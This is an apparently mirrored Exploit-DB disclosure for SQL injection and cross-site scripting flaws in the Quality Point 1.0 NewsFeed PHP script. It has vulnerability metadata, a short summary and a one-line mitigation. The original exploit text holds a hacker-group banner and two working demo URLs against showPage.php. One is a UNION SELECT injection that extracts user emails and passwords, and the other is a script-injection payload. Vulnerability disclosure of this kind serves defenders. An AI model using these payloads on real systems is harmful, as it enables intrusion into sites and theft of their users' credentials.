header-logo
Suggest Exploit
vendor:
Quality Point 1.0
by:
Red-D3v1L
8,8
CVSS
HIGH
SQL Injection and XSS
89, 79
CWE
Product Name: Quality Point 1.0
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:qualitypointtech:quality_point_1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Quality Point 1.0 NewsFeed (SQL/XSS) Multiple Remote Vulnerabilities

The Quality Point 1.0 NewsFeed is vulnerable to SQL injection and XSS attacks. An attacker can exploit the vulnerability by sending a malicious SQL query to the showPage.php page with the id parameter. The malicious query will be executed in the database and the attacker can gain access to sensitive information. An attacker can also exploit the XSS vulnerability by sending a malicious script to the showPage.php page with the id parameter. The malicious script will be executed in the browser and the attacker can gain access to sensitive information.

Mitigation:

Input validation should be used to prevent SQL injection and XSS attacks. The application should also be tested for vulnerabilities regularly.
Source

Exploit-DB raw data:

sEc-r1z crEw The Leaders for Penetration Testing In Middle East.
+===================================================================================+
            ./SEC-R1Z   _ __ _  _ _ _ ___ _ _ _ _   __  _ _ _ _ _         
            / /_ _ _ _ /   _ _\/   _ _ /\        \<   |/_ _ _ _ /
            \ \_ _ _ _/  /___ /  /   __  |  |)   / |  |   /   /
             \_ _ _ _/  /___ /  /  | __ ||      /  |  |  /   /
              _______\  \_ _ \  \2_0_1_0 |      \  |  | /   /____
            /_ _ _ _ _\ _ _ _/\ _ _ _ /  |__|\ __\ |__|/_ _ _ _ _\ R.I.P MichaelJackson !!!!!
+===================================================================================+
  
    [?] ~ Note : sEc-r1z CrEw# r0x !
==============================================================================
    [?] Quality Point 1.0 NewsFeed (SQL/XSS) Multiple Remote Vulnerabilities
==============================================================================
    [?] My home:              [ http://sec-r1z.com ]
    [?] For Ask:              [r-d@passport.com]
    [?] Script:               [ Quality Point 1.0 ]
    [?] home Script           [ http://qualitypointtech.net ]
    [?] Language:             [ PHP ]
    [?[ Best WishEs :         [ The Love is End ... ]
    [?] Founder:              [ Red-D3v1L ]
    [?] Gr44tz to:            [ sec-r1z# CrEw - Mr.Tro0oqy - r1z - Sas-TerrOrisT And All My Frindes ]
########################################################################
    
===[ Exploit SQL ]===
 
    
[»]Exploit :
 
path/showPage.php?id=[SQL injection ]

[>>] Demo : 

http://server/NewsFeed/showPage.php?id=-348+union+select+1,concat%28email,0x3e,version%28%29,0x3e,password%29,3,4,5+from+qualityp_fnt.users%20--

------------
===[ Exploit XSS ]===

[»]Exploit :

showPage.php?id=[XSS]

[>>] Demo : 

http://server/NewsFeed/showPage.php?id=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E

-----------------------

Navigation

Suggest Exploit

Services By CQR